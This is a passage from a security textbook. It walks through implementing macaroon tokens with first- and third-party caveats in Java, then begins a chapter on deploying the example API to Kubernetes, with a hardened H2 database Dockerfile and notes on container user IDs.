import com.github.nitram509.jmacaroons.*;
import com.github.nitram509.jmacaroons.verifier.*;
import spark.Request;

public class MacaroonTokenStore implements SecureTokenStore {
private final TokenStore delegate;
private final Key macKey;

private MacaroonTokenStore(TokenStore delegate, Key macKey) {
this.delegate = delegate;
this.macKey = macKey;
}

@Override
public String create(Request request, Token token) {
// Use another token store to create a unique identifier for this macaroon.
var identifier = delegate.create(request, token);
// Create the macaroon with a location hint, the identifier,
// and the authentication key.
var macaroon = MacaroonsBuilder.create("",
macKey.getEncoded(), identifier);
// Return the serialized URL-safe string form of the macaroon.
return macaroon.serialize();
}
}
Like the HmacTokenStore from chapter 4, the macaroon token store only provides
authentication of tokens and not confidentiality unless the underlying store already
provides that. Just as you did in chapter 5, you can create two static factory methods
that return a correctly typed store depending on the underlying token store:
- If the underlying token store is a ConfidentialTokenStore, then it returns a
  SecureTokenStore because the resulting store provides both confidentiality
  and authenticity of tokens.
- Otherwise, it returns an AuthenticatedTokenStore to make clear that
  confidentiality is not guaranteed.
These factory methods are shown in listing 9.14 and are very similar to the ones you
created in chapter 5, so open the MacaroonTokenStore.java file again and add these
new methods.

Listing 9.14 Factory methods
// If the underlying store provides confidentiality of token data,
// then return a SecureTokenStore.
public static SecureTokenStore wrap(
ConfidentialTokenStore tokenStore, Key macKey) {
return new MacaroonTokenStore(tokenStore, macKey);
}

// Otherwise, return an AuthenticatedTokenStore.
public static AuthenticatedTokenStore wrap(
TokenStore tokenStore, Key macKey) {
return new MacaroonTokenStore(tokenStore, macKey);
}
To verify a macaroon, you deserialize and validate the macaroon using a Macaroons-
Verifier, which will verify the HMAC tag and check any caveats. If the macaroon is
valid, then you can look up the identifier in the delegate token store. To revoke a mac-
aroon, you simply deserialize and revoke the identifier. In most cases, you shouldn’t
check the caveats on the token when it is being revoked, because if somebody has
gained access to your token, the least malicious thing they can do with it is revoke it!
However, in some cases, malicious revocation might be a real threat, in which case you
could verify the caveats to reduce the risk of this occurring. Listing 9.15 shows the
operations to read and revoke a macaroon token. Open the MacaroonTokenStore
.java file again and add the new methods.

Listing 9.15 Reading a macaroon token
@Override
public Optional<Token> read(Request request, String tokenId) {
// Deserialize and validate the macaroon signature and caveats.
var macaroon = MacaroonsBuilder.deserialize(tokenId);
var verifier = new MacaroonsVerifier(macaroon);
if (verifier.isValid(macKey.getEncoded())) {
// If the macaroon is valid, then look up the identifier
// in the delegate token store.
return delegate.read(request, macaroon.identifier);
}
return Optional.empty();
}

@Override
public void revoke(Request request, String tokenId) {
// To revoke a macaroon, revoke the identifier in the delegate store.
var macaroon = MacaroonsBuilder.deserialize(tokenId);
delegate.revoke(request, macaroon.identifier);
}
WIRING IT UP
You can now wire up the CapabilityController to use the new token store for capa-
bility tokens. Open the Main.java file in your editor and find the lines that construct
the CapabilityController. Update the file to use the MacaroonTokenStore instead.
You may need to first move the code that reads the macKey from the keystore (see
chapter 6) from later in the file. The code should look as follows, with the new part
highlighted in bold:
var keyPassword = System.getProperty("keystore.password",
"changeit").toCharArray();
var keyStore = KeyStore.getInstance("PKCS12");
keyStore.load(new FileInputStream("keystore.p12"),
keyPassword);
var macKey = keyStore.getKey("hmac-key", keyPassword);
var encKey = keyStore.getKey("aes-key", keyPassword);
var capController = new CapabilityController(
MacaroonTokenStore.wrap(
new DatabaseTokenStore(database), macKey));
If you now use the API to create a new space, you’ll see the macaroon tokens being
used in the capability URIs returned from the API call. You can copy and paste those
tokens into the debugger at http://macaroons.io to see the component parts.
CAUTION
You should not paste tokens from a production system into any
website. At the time of writing, macaroons.io doesn’t even support SSL.
As currently written, the macaroon token store works very much like the existing
HMAC token store. In the next sections, you’ll implement support for caveats to take
full advantage of the new token format.
9.3.3 First-party caveats
The simplest caveats are first-party caveats, which can be verified by the API purely
based on the API request and the current environment. These caveats are represented
as strings and there is no standard format. The only commonly implemented first-
party caveat is to set an expiry time for the macaroon using the syntax:
time < 2019-10-12T12:00:00Z
You can think of this caveat as being like the expiry (exp) claim in a JWT (chapter 6).
The tokens issued by the Natter API already have an expiry time, but a client might
want to create a copy of their token with a more restricted expiry time as discussed in
section 9.3.1 on contextual caveats.
To verify any expiry time caveats, you can use a TimestampCaveatVerifier that
comes with the jmacaroons library as shown in listing 9.16. The macaroons library will
try to match each caveat to a verifier that is able to satisfy it. In this case, the verifier
checks that the current time is before the expiry time specified in the caveat. If the
verification fails, or if the library is not able to find a verifier that matches a caveat,
then the macaroon is rejected. This means that the API must explicitly register verifi-
ers for all types of caveats that it supports. Trying to add a caveat that the API doesn’t
support will prevent the macaroon from being used. Open the MacaroonToken-
Store.java file in your editor again and update the read method to verify expiry caveats
as shown in the listing.
Listing 9.16 Verifying the expiry timestamp

@Override
public Optional<Token> read(Request request, String tokenId) {
var macaroon = MacaroonsBuilder.deserialize(tokenId);
var verifier = new MacaroonsVerifier(macaroon);
// Add a TimestampCaveatVerifier to satisfy the expiry caveat.
verifier.satisfyGeneral(new TimestampCaveatVerifier());
if (verifier.isValid(macKey.getEncoded())) {
return delegate.read(request, macaroon.identifier);
}
return Optional.empty();
}
You can also add your own caveat verifiers using two methods. The simplest is the
satisfyExact method, which will satisfy caveats that exactly match the given string.
For example, you can allow a client to restrict a macaroon to a single type of HTTP
method by adding the line:
verifier.satisfyExact("method = " + request.requestMethod());
to the read method. This ensures that a macaroon with the caveat method = GET can
only be used on HTTP GET requests, effectively making it read-only. Add that line to
the read method now.
A more general approach is to implement the GeneralCaveatVerifier interface,
which allows you to implement arbitrary conditions to satisfy a caveat. Listing 9.17
shows an example verifier to check that the since query parameter to the find-
Messages method is after a certain time, allowing you to restrict a client to only view
messages since yesterday. The class parses the caveat and the parameter as Instant
objects and then checks that the request is not trying to read messages older than the
caveat using the isAfter method. Open the MacaroonTokenStore.java file again and
add the contents of listing 9.17 as an inner class.
Listing 9.17 A custom caveat verifier

private static class SinceVerifier implements GeneralCaveatVerifier {
private final Request request;

private SinceVerifier(Request request) {
this.request = request;
}

@Override
public boolean verifyCaveat(String caveat) {
// Check the caveat matches and parse the restriction.
if (caveat.startsWith("since > ")) {
var minSince = Instant.parse(caveat.substring(8));
// Determine the "since" parameter value on the request.
var reqSince = Instant.now().minus(1, ChronoUnit.DAYS);
if (request.queryParams("since") != null) {
reqSince = Instant.parse(request.queryParams("since"));
}
// Satisfy the caveat if the request is after the
// earliest message restriction.
return reqSince.isAfter(minSince);
}
// Reject all other caveats.
return false;
}
}
You can then add the new verifier to the read method by adding the following line
verifier.satisfyGeneral(new SinceVerifier(request));
next to the lines adding the other caveat verifiers. The finished code to construct the
verifier should look as follows:
var verifier = new MacaroonsVerifier(macaroon);
verifier.satisfyGeneral(new TimestampCaveatVerifier());
verifier.satisfyExact("method = " + request.requestMethod());
verifier.satisfyGeneral(new SinceVerifier(request));
ADDING CAVEATS
To add a caveat to a macaroon, you can parse it using the MacaroonsBuilder class and
then use the add_first_party_caveat method to append caveats, as shown in list-
ing 9.18. The listing is a standalone command-line program for adding caveats to a
macaroon. It first parses the macaroon, which is passed as the first argument to the
program, and then loops through any remaining arguments treating them as caveats.
Finally, it prints out the resulting macaroon as a string again. Navigate to the src/main/
java/com/manning/apisecurityinaction folder and create a new file named Caveat-
Appender.java and type in the contents of the listing.

Listing 9.18 Appending caveats
package com.manning.apisecurityinaction;

import com.github.nitram509.jmacaroons.MacaroonsBuilder;
import static com.github.nitram509.jmacaroons.MacaroonsBuilder.deserialize;

public class CaveatAppender {
public static void main(String... args) {
// Parse the macaroon and create a MacaroonsBuilder.
var builder = new MacaroonsBuilder(deserialize(args[0]));
// Add each caveat to the macaroon.
for (int i = 1; i < args.length; ++i) {
var caveat = args[i];
builder.add_first_party_caveat(caveat);
}
// Serialize the macaroon back into a string.
System.out.println(builder.getMacaroon().serialize());
}
}
IMPORTANT
Compared to the server, the client needs only a few lines of code
to append caveats and doesn’t need to store any secret keys.
To test out the program, use the Natter API to create a new social space and receive a
capability URI with a macaroon token. In this example, I’ve used the jq and cut utili-
ties to extract the macaroon token, but you can manually copy and paste if you prefer:
MAC=$(curl -u demo:changeit -H 'Content-Type: application/json' \
-d '{"owner":"demo","name":"test"}' \
https://localhost:4567/spaces | jq -r '.["messages-rw"]' \
| cut -d= -f2)
You can then append a caveat, for example setting the expiry time a minute or so into
the future:
NEWMAC=$(mvn -q exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.CaveatAppender \
-Dexec.args="$MAC 'time < 2020-08-03T12:05:00Z'")
You can then use this new macaroon to read any messages in the space until it expires:
curl -u demo:changeit -i \
"https://localhost:4567/spaces/1/messages?access_token=$NEWMAC"
After the new time limit expires, the request will return a 403 Forbidden error, but the
original token will still work (just change $NEWMAC to $MAC in the query to test this).
This demonstrates the core advantage of macaroons: once you’ve configured the
server it’s very easy (and fast) for a client to append contextual caveats that restrict the
use of a token, protecting those tokens in case of compromise. A JavaScript client run-
ning in a web browser can use a JavaScript macaroon library to easily append caveats
every time it uses a token with just a few lines of code.
9.3.4 Third-party caveats
First-party caveats provide considerable flexibility and security improvements over tra-
ditional tokens on their own, but macaroons also allow third-party caveats that are ver-
ified by an external service. Rather than the API verifying a third-party caveat directly,
the client instead must contact the third-party service itself and obtain a discharge mac-
aroon that proves that the condition is satisfied. The two macaroons are cryptographi-
cally tied together so that the API can verify that the condition is satisfied without
talking directly to the third-party service.
DEFINITION
A discharge macaroon is obtained by a client from a third-party ser-
vice to prove that a third-party caveat is satisfied. A third-party service is any
service that isn’t the client or the server it is trying to access. The discharge
macaroon is cryptographically bound to the original macaroon such that the
API can ensure that the condition has been satisfied without talking directly
to the third-party service.
Third-party caveats provide the basis for loosely coupled decentralized authorization
and provide some interesting properties:
The API doesn’t need to directly communicate with the third-party service.
No details about the query being answered by the third-party service are dis-
closed to the client. This can be important if the query contains personal infor-
mation about a user.
The discharge macaroon proves that the caveat is satisfied without revealing any
details to the client or the API.
Because the discharge macaroon is itself a macaroon, the third-party service
can attach additional caveats to it that the client must satisfy before it is granted
access, including further third-party caveats.
For example, a client might be issued with a long-term macaroon token to perform
banking activities on behalf of a user, such as initiating payments from their account. As
well as first-party caveats restricting how much the client can transfer in a single trans-
action, the bank might attach a third-party caveat that requires the client to obtain
authorization for each payment from a transaction authorization service. The transac-
tion authorization service checks the details of the transaction and potentially con-
firms the transaction directly with the user before issuing a discharge macaroon tied
to that one transaction. This pattern of having a single long-lived token providing gen-
eral access, but then requiring short-lived discharge macaroons to authorize specific
transactions is a perfect use case for third-party caveats.
CREATING THIRD-PARTY CAVEATS
Unlike a first-party caveat, which is a simple string, a third-party caveat has three com-
ponents:
- A location hint telling the client where to locate the third-party service.
- A unique unguessable secret string, which will be used to derive a new HMAC
  key that the third-party service will use to sign the discharge macaroon.
- An identifier for the caveat that the third-party can use to identify the query.
  This identifier is public and so shouldn't reveal the secret.
To add a third-party caveat to a macaroon, you use the add_third_party_caveat
method on the MacaroonsBuilder object:
// Modify an existing macaroon to add a caveat.
macaroon = MacaroonsBuilder.modify(macaroon)
// Add the third-party caveat.
.add_third_party_caveat("https://auth.example.com",
secret, caveatId)
.getMacaroon();
The unguessable secret should be generated with high entropy, such as a 256-bit value
from a SecureRandom:
var key = new byte[32];
new SecureRandom().nextBytes(key);
var secret = Base64.getEncoder().encodeToString(key);
When you add a third-party caveat to a macaroon, this secret is encrypted so that only
the API that verifies the macaroon will be able to decrypt it. The party appending the
caveat also needs to communicate the secret and the query to be verified to the third-
party service. There are two ways to accomplish this, with different trade-offs:
The caveat appender can encode the query and the secret into a message and
encrypt it using a public key from the third-party service. The encrypted value is
then used as the identifier for the third-party caveat. The third-party can then
decrypt the identifier to discover the query and secret. The advantage of this
approach is that the API doesn’t need to directly talk to the third-party service,
but the encrypted identifier may be quite large.
Alternatively, the caveat appender can contact the third-party service directly
(via a REST API, for example) to register the caveat and secret. The third-party
service would then store these and return a random value (known as a ticket)
that can be used as the caveat identifier. When the client presents the identifier
to the third-party it can look up the query and secret in its local storage based
on the ticket. This solution is likely to produce smaller identifiers, but at the
cost of additional network requests and storage at the third-party service.
There's currently no standard for either of these two options: nothing defines what the
API for registering a caveat should look like in the second case, or which public key
encryption algorithm and message format should be used in the first. There's also no
standard describing how a client presents the caveat identifier to the third-party service.
In practice, this limits the use of third-party caveats, because client developers need to
know how to integrate with each service individually, so they're typically used only
within a closed ecosystem.
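To make the second option concrete, the registration step might look something like the following sketch. It is purely illustrative: the /caveats endpoint, the JSON field names, and the ticket response are invented here precisely because no standard defines them, and it assumes the java.net.http and org.json classes used elsewhere in this book.

// Hypothetical registration of a caveat with the third-party service.
var registration = new JSONObject()
        .put("caveat", "user = alice")  // the query the third party will answer
        .put("secret", secret);         // the unguessable secret from earlier
var request = HttpRequest.newBuilder(
            URI.create("https://auth.example.com/caveats"))
        .header("Content-Type", "application/json")
        .POST(HttpRequest.BodyPublishers.ofString(registration.toString()))
        .build();
var response = HttpClient.newHttpClient()
        .send(request, HttpResponse.BodyHandlers.ofString());
// The returned ticket becomes the third-party caveat identifier.
var caveatId = new JSONObject(response.body()).getString("ticket");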
Pop quiz

6 Which of the following apply to a first-party caveat? Select all that apply.
  a It's a simple string.
  b It's satisfied using a discharge macaroon.
  c It requires the client to contact another service.
  d It can be checked at the point of use by the API.
  e It has an identifier, a secret string, and a location hint.

7 Which of the following apply to a third-party caveat? Select all that apply.
  a It's a simple string.
  b It's satisfied using a discharge macaroon.
  c It requires the client to contact another service.
  d It can be checked at the point of use by the API.
  e It has an identifier, a secret string, and a location hint.

The answers are at the end of the chapter.
Summary
Capability URIs can be used to provide fine-grained access to individual resources
via your API. A capability URI combines an identifier for a resource along with
a set of permissions to access that resource.
As an alternative to identity-based access control, capabilities avoid ambient
authority that can lead to confused deputy attacks and embrace POLA.
There are many ways to form capability URIs that have different trade-offs. The
simplest forms encode a random token into the URI path or query parameters.
More secure variants encode the token into the fragment or userinfo components
but come at a cost of increased complexity for clients.
Tying a capability URI to a user session increases the security of both, because it
reduces the risk of capability tokens being stolen and can be used to prevent
CSRF attacks. This makes it harder to share capability URIs.
Macaroons allow anybody to restrict a capability by appending caveats that can
be cryptographically verified and enforced by an API. Contextual caveats can be
appended just before a macaroon is used to secure a token against misuse.
First-party caveats encode simple conditions that can be checked locally by an
API, such as restricting the time of day at which a token can be used. Third-party
caveats require the client to obtain a discharge macaroon from an external service
proving that it satisfies a condition, such as that the user is an employee of a
certain company or is over 18 years old.

Answers to pop quiz questions

1 a, e, f, or g are all acceptable places to encode the token. The others are likely
to interfere with the functioning of the URI.
2 c, d, and e.
3 b and e would prevent tokens filling up the database. Using a more scalable
database is likely to just delay this (and increase your costs).
4 e. Without returning links, a client has no way to create URIs to other resources.
5 d. If the server redirects, the browser will copy the fragment to the new URL
unless a new one is specified. This can leak the token to other servers. For
example, if you redirect the user to an external login service, the fragment
component is not sent to the server and is not included in Referer headers.
6 a and d.
7 b, c, and e.
Part 4
Microservice APIs in Kubernetes
The Kubernetes project has exploded in popularity in recent years as the
preferred environment for deploying server software. That growth has been
accompanied by a shift to microservice architectures, in which complex applica-
tions are split into separate components communicating over service-to-service
APIs. In this part of the book, you’ll see how to deploy microservice APIs in
Kubernetes and secure them from threats.
Chapter 10 is a lightning tour of Kubernetes and covers security best prac-
tices for deploying services in this environment. You’ll look at preventing com-
mon attacks against internal APIs and how to harden the environment against
attackers.
After hardening the environment, chapter 11 discusses approaches to
authentication in service-to-service API calls. You’ll see how to use JSON Web
Tokens and OAuth2 and how to harden these approaches in combination with
mutual TLS authentication. The chapter concludes by looking at patterns for
end-to-end authorization when a single user API request triggers multiple inter-
nal API calls between microservices.
Microservice APIs in Kubernetes

This chapter covers
 Deploying an API to Kubernetes
 Hardening Docker container images
 Setting up a service mesh for mutual TLS
 Locking down the network using network policies
 Supporting external clients with an ingress controller
In the chapters so far, you have learned how to secure user-facing APIs from a vari-
ety of threats using security controls such as authentication, authorization, and
rate-limiting. It’s increasingly common for applications to themselves be structured
as a set of microservices, communicating with each other using internal APIs intended
to be used by other microservices rather than directly by users. The example in fig-
ure 10.1 shows a set of microservices implementing a fictional web store. A single
user-facing API provides an interface for a web application, and in turn, calls sev-
eral backend microservices to handle stock checks, process payment card details,
and arrange for products to be shipped once an order is placed.
DEFINITION
A microservice is an independently deployed service that is a
component of a larger application. Microservices are often contrasted with
monoliths, where all the components of an application are bundled into a
single deployed unit. Microservices communicate with each other using APIs
over a protocol such as HTTP.
Some microservices may also need to call APIs provided by external services, such as a
third-party payment processor. In this chapter, you’ll learn how to securely deploy
microservice APIs as Docker containers on Kubernetes, including how to harden con-
tainers and the cluster network to reduce the risk of compromise, and how to run TLS
at scale using Linkerd (https://linkerd.io) to secure microservice API communications.
10.1 Microservice APIs on Kubernetes
Although the concepts in this chapter are applicable to most microservice deployments,
in recent years the Kubernetes project (https://kubernetes.io) has emerged as a leading
approach to deploying and managing microservices in production. To keep things
concrete, you'll use Kubernetes to deploy the examples in this part of the book.
Appendix B has detailed instructions on how to set up the Minikube environment for
running Kubernetes on your development machine. You should follow those
instructions now before continuing with the chapter.

Figure 10.1 In a microservices architecture, a single application is broken into loosely
coupled services that communicate using remote APIs. In this example, a fictional web
store has an API for web clients that calls internal services to check stock levels,
process payments, and arrange shipping when an order is placed. Frontend services may
call many backend services, each backend service may have a different database, and
some microservices may call external APIs to get their jobs done.
The basic concepts of Kubernetes relevant to deploying an API are shown in fig-
ure 10.2. A Kubernetes cluster consists of a set of nodes, which are either physical or
virtual machines (VMs) running the Kubernetes software. When you deploy an app to
the cluster, Kubernetes replicates the app across nodes to achieve availability and scal-
ability requirements that you specify. For example, you might specify that you always
require at least three copies of your app to be running, so that if one fails the other
two can handle the load. Kubernetes ensures these availability goals are always
satisfied, redistributing apps as nodes are added or removed from the cluster. An app
is implemented by one or more pods, which encapsulate the software needed to run
that app. A pod is itself made up of one or more Linux containers, each typically run-
ning a single process such as an HTTP API server.
DEFINITION
A Kubernetes node is a physical or virtual machine that forms part
of the Kubernetes cluster. Each node runs one or more pods that implement
apps running on the cluster. A pod is itself a collection of Linux containers,
and each container runs a single process such as an HTTP server.

Figure 10.2 In Kubernetes, an app is implemented by one or more identical pods
running on physical or virtual machines known as nodes. A pod itself is a collection
of Linux containers, each of which typically has a single process running within it,
such as an API server.
A Linux container is the name given to a collection of technologies within the Linux
operating system that allow a process (or collection of processes) to be isolated from
other processes so that it sees its own view of the file system, network, users, and other
shared resources. This simplifies packaging and deployment, because different pro-
cesses can use different versions of the same components, which might otherwise
cause conflicts. You can even run entirely different distributions of Linux within con-
tainers simultaneously on the same operating system kernel. Containers also provide
security benefits, because processes can be locked down within a container such that it
is much harder for an attacker that compromises one process to break out of the con-
tainer and affect other processes running in different containers or the host operating
system. In this way, containers provide some of the benefits of VMs, but with lower
overhead. Several tools for packaging Linux containers have been developed, the
most famous of which is Docker (https://www.docker.com), which many Kubernetes
deployments build on top of.
LEARN ABOUT IT
Securing Linux containers is a complex topic, and we'll
cover only the basics in this book. The NCC Group have published a freely
available 123-page guide to hardening containers at http://mng.bz/wpQQ.
In most cases, a pod should contain only a single main container and that container
should run only a single process. If the process (or node) dies, Kubernetes will restart
the pod automatically, possibly on a different node. There are two general exceptions
to the one-container-per-pod rule:
An init container runs before any other containers in the pod and can be used to
perform initialization tasks, such as waiting for other services to become avail-
able. The main container in a pod will not be started until all init containers
have completed.
A sidecar container runs alongside the main container and provides additional
services. For example, a sidecar container might implement a reverse proxy for
an API server running in the main container, or it might periodically update
data files on a filesystem shared with the main container.
For the most part, you don’t need to worry about these different kinds of containers in
this chapter and can stick to the one-container-per-pod rule. You’ll see an example of
a sidecar container when you learn about the Linkerd service mesh in section 10.3.2.
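For example, an init container that blocks until the database service used later in this chapter is resolvable might look like the following sketch. The busybox image and the nslookup loop are a common pattern from the Kubernetes documentation, not part of the Natter configuration:

spec:
  initContainers:
    - name: wait-for-database
      image: busybox:1.32
      # Loop until the database service's DNS name resolves.
      command: ['sh', '-c',
        'until nslookup natter-database-service; do sleep 2; done']
  containers:
    - name: natter-api
      image: apisecurityinaction/natter-api:latest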
A Kubernetes cluster can be highly dynamic with pods being created and destroyed
or moved from one node to another to achieve performance and availability goals. This
makes it challenging for a container running in one pod to call an API running in
another pod, because the IP address may change depending on what node (or nodes) it
happens to be running on. To solve this problem, Kubernetes has the concept of a ser-
vice, which provides a way for pods to find other pods within the cluster. Each service
running within Kubernetes is given a virtual IP address that is unique to that service,
and Kubernetes keeps track of which pods implement that service. In a microservice
architecture, you would register each microservice as a separate Kubernetes service.
A process running in a container can call another microservice’s API by making a net-
work request to the virtual IP address corresponding to that service. Kubernetes will
intercept the request and redirect it to a pod that implements the service.
DEFINITION
A Kubernetes service provides a fixed virtual IP address that can
be used to send API requests to microservices within the cluster. Kubernetes
will route the request to a pod that implements the service.
As pods and nodes are created and deleted, Kubernetes updates the service metadata
to ensure that requests are always sent to an available pod for that service. A DNS ser-
vice is also typically running within a Kubernetes cluster to convert symbolic names for
services, such as payments.myapp.svc.example.com, into its virtual IP address, such as
192.168.0.12. This allows your microservices to make HTTP requests to hard-coded
URIs and rely on Kubernetes to route the request to an appropriate pod. By default,
services are accessible internally only within the Kubernetes network, but you can also
publish a service to a public IP address either directly or using a reverse proxy or load
balancer. You’ll learn how to deploy a reverse proxy in section 10.4.
Pop quiz

1 A Kubernetes pod contains which one of the following components?
  a Node
  b Service
  c Container
  d Service mesh
  e Namespace

2 True or False: A sidecar container runs to completion before the main container
starts.

The answers are at the end of the chapter.

10.2 Deploying Natter on Kubernetes
In this section, you’ll learn how to deploy a real API into Kubernetes and how to con-
figure pods and services to allow microservices to talk to each other. You’ll also add a
new link-preview microservice as an example of securing microservice APIs that are
not directly accessible to external users. After describing the new microservice, you’ll
use the following steps to deploy the Natter API to Kubernetes:
1 Build the H2 database as a Docker container.
2 Deploy the database to Kubernetes.
3 Build the Natter API as a Docker container and deploy it.
4 Build the new link-preview microservice.
5 Deploy the new microservice and expose it as a Kubernetes service.
6 Adjust the Natter API to call the new microservice API.
You’ll then learn how to avoid common security vulnerabilities that the link-preview
microservice introduces and harden the network against common attacks. But first
let’s motivate the new link-preview microservice.
You’ve noticed that many Natter users are using the app to share links with each
other. To improve the user experience, you’ve decided to implement a feature to gener-
ate previews for these links. You’ve designed a new microservice that will extract links
from messages and fetch them from the Natter servers to generate a small preview based
on the metadata in the HTML returned from the link, making use of any Open Graph
tags in the page (https://ogp.me). For now, this service will just look for a title, descrip-
tion, and optional image in the page metadata, but in future you plan to expand the ser-
vice to handle fetching images and videos. You’ve decided to deploy the new link-
preview API as a separate microservice, so that an independent team can develop it.
Figure 10.3 shows the new deployment, with the existing Natter API and database
joined by the new link-preview microservice. Each of the three components is imple-
mented by a separate group of pods, which are then exposed internally as three
Kubernetes services:
The H2 database runs in one pod and is exposed as the natter-database-service.
The link-preview microservice runs in another pod and provides the
natter-link-preview-service.
The main Natter API runs in yet another pod and is exposed as the
natter-api-service.
Figure 10.3 The link-preview API is developed and deployed as a new microservice,
separate from the main Natter API and running in different pods. The link-preview
service generates previews by fetching any URLs found within Natter messages (for
example, links to apple.com, manning.com, or google.com); all other functions are
handled by the original Natter API and database.
You’ll use a single pod for each service in this chapter, for simplicity, but Kubernetes
allows you to run multiple copies of a pod on multiple nodes for performance and
reliability: if a pod (or node) crashes, Kubernetes can then redirect requests to another
pod implementing the same service.
Separating the link-preview service from the main Natter API also has security ben-
efits, because fetching and parsing arbitrary content from the internet is potentially
risky. If this was done within the main Natter API process, then any mishandling of
those requests could compromise user data or messages. Later in the chapter you’ll
see examples of attacks that can occur against this link-preview API and how to lock
down the environment to prevent them causing any damage. Separating potentially
risky operations into their own environments is known as privilege separation.
DEFINITION
Privilege separation is a design technique based on extracting poten-
tially risky operations into a separate process or environment that is isolated
from the main process. The extracted process can be run with fewer privi-
leges, reducing the damage if it is ever compromised.
Before you develop the new link-preview service, you’ll get the main Natter API run-
ning on Kubernetes with the H2 database running as a separate service.
10.2.1 Building the H2 database as a Docker container
Although the H2 database you’ve used for the Natter API in previous chapters is
intended primarily for embedded use, it does come with a simple server that can be
used for remote access. The first step of running the Natter API on Kubernetes is to
build a Linux container for running the database. There are several varieties of Linux
container; in this chapter, you'll build a Docker container, because that is the default
used by the Minikube environment for running Kubernetes on a local developer machine.
See appendix B for detailed instructions on how to install and configure Docker and
Minikube. Docker container images are built using a Dockerfile, which is a script that
describes how to build and run the software you need.
DEFINITION
A container image is a snapshot of a Linux container that can be
used to create many identical container instances. Docker images are built in
layers from a base image that specifies the Linux distribution such as Ubuntu
or Debian. Different containers can share the base image and apply differ-
ent layers on top, reducing the need to download and store large images
multiple times.
Because there is no official H2 database Docker image, you can create your own, as
shown in listing 10.1. Navigate to the root folder of the Natter project and create a
new folder named docker and then create a folder inside there named h2. Create a new
file named Dockerfile in the new docker/h2 folder you just created with the contents
of the listing. A Dockerfile consists of the following components:
A base image, which is typically a Linux distribution such as Debian or Ubuntu.
The base image is specified using the FROM statement.
A series of commands telling Docker how to customize that base image for your
app. This includes installing software, creating user accounts and permissions,
or setting up environment variables. The commands are executed within a con-
tainer running the base image.
DEFINITION
A base image is a Docker container image that you use as a starting
point for creating your own images. A Dockerfile modifies a base image to install
additional dependencies and configure permissions.
The Dockerfile in the listing downloads the latest release of H2, verifies its SHA-256
hash to ensure the file hasn’t changed, and unpacks it. The Dockerfile uses curl to
download the H2 release and sha256sum to verify the hash, so you need to use a base
image that includes these commands. Docker runs these commands in a container
running the base image, so it will fail if these commands are not available, even if you
have curl and sha256sum installed on your development machine.
To reduce the size of the final image and remove potentially vulnerable files, you
can then copy the server binaries into a different, minimal base image. This is known
as a Docker multistage build and is useful to allow the build process to use a full-featured
image while the final image is based on something more stripped-down. This is done
in listing 10.1 by adding a second FROM command to the Dockerfile, which causes
Docker to switch to the new base image. You can then copy files from the build image
using the COPY --from command as shown in the listing.
DEFINITION
A Docker multistage build allows you to use a full-featured base
image to build and configure your software but then switch to a stripped-
down base image to reduce the size of the final image.
In this case, you can use Google’s distroless base image, which contains just the Java 11
runtime and its dependencies and nothing else (not even a shell). Once you’ve cop-
ied the server files into the base image, you can then expose port 9092 so that the
server can be accessed from outside the container and configure it to use a non-root
user and group to run the server. Finally, define the command to run to start the
server using the ENTRYPOINT command.
TIP
Using a minimal base image such as the Alpine distribution or Google’s
distroless images reduces the attack surface of potentially vulnerable software
and limits further attacks that can be carried out if the container is ever com-
promised. In this case, an attacker would be quite happy to find curl on a
compromised container, but this is missing from the distroless image as is
almost anything else they could use to further an attack. Using a minimal
image also reduces the frequency with which you’ll need to apply security
updates to patch known vulnerabilities in the distribution because the vulner-
able components are not present.
343
Deploying Natter on Kubernetes
Listing 10.1 The H2 database Dockerfile

FROM curlimages/curl:7.66.0 AS build-env

# Define environment variables for the release file and its hash.
ENV RELEASE h2-2018-03-18.zip
ENV SHA256 \
    a45e7824b4f54f5d9d65fb89f22e1e75ecadb15ea4dcf8c5d432b80af59ea759

WORKDIR /tmp

# Download the release and verify the SHA-256 hash, then unzip
# the download and delete the zip file.
RUN echo "$SHA256  $RELEASE" > $RELEASE.sha256 && \
    curl -sSL https://www.h2database.com/$RELEASE -o $RELEASE && \
    sha256sum -b -c $RELEASE.sha256 && \
    unzip $RELEASE && rm -f $RELEASE

# Copy the binary files into a minimal container image.
FROM gcr.io/distroless/java:11
WORKDIR /opt
COPY --from=build-env /tmp/h2/bin /opt/h2

# Ensure the process runs as a non-root user and group.
USER 1000:1000

# Expose the H2 default TCP port.
EXPOSE 9092

# Configure the container to run the H2 server.
ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/urandom", \
    "-cp", "/opt/h2/h2-1.4.197.jar", \
    "org.h2.tools.Server", "-tcp", "-tcpAllowOthers"]
Linux users and UIDs
When you log in to a Linux operating system (OS) you typically use a string username
such as “guest” or “root.” Behind the scenes, Linux maps these usernames into 32-
bit integer UIDs (user IDs). The same happens with group names, which are mapped
to integer GIDs (group IDs). The mapping between usernames and UIDs is done by
the /etc/passwd file, which can differ inside a container from the host OS. The root
user always has a UID of 0. Normal users usually have UIDs starting at 500 or 1000.
All permissions to access files and other resources are determined by the operating
system in terms of UIDs and GIDs rather than user and group names, and a process
can run with a UID or GID that doesn’t correspond to any named user or group.
By default, UIDs and GIDs within a container are identical to those in the host. So UID
0 within the container is the same as UID 0 outside the container: the root user. If you
run a process inside a container with a UID that happens to correspond to an existing
user in the host OS, then the container process will inherit all the permissions of that
user on the host. For added security, your Docker images can create a new user and
group and let the kernel assign an unused UID and GID without any existing permis-
sions in the host OS. If an attacker manages to exploit a vulnerability to gain access to
the host OS or filesystem, they will have no (or very limited) permissions.
A Linux user namespace can be used to map UIDs within the container to a different
range of UIDs on the host. This allows a process running as UID 0 (root) within a
container to be mapped to a non-privileged UID such as 20000 in the host. As far as
the container is concerned, the process is running as root, but it would not have root
privileges if it ever broke out of the container to access the host. See
https://docs.docker.com/engine/security/userns-remap/ for how to enable a user
namespace in Docker. This is not yet possible in Kubernetes, but there are several
alternative options for reducing user privileges inside a pod that are discussed later
in the chapter.
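For example, on a Debian-based image (unlike the distroless image used in this chapter, which has no shell to run these commands), a sketch of creating such an account might look like this:

FROM debian:buster-slim
# Create a dedicated group and user whose IDs don't correspond
# to any named account on a typical host OS.
RUN groupadd --gid 1001 natter && \
    useradd --uid 1001 --gid natter --shell /usr/sbin/nologin natter
# Run the rest of the build, and the container itself, as that user.
USER natter:natter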
When you build a Docker image, it gets cached by the Docker daemon that runs the
build process. To use the image elsewhere, such as within a Kubernetes cluster, you
must first push the image to a container repository such as Docker Hub (https://
hub.docker.com) or a private repository within your organization. To avoid having to
configure a repository and credentials in this chapter, you can instead build directly to
the Docker daemon used by Minikube by running the following commands in your
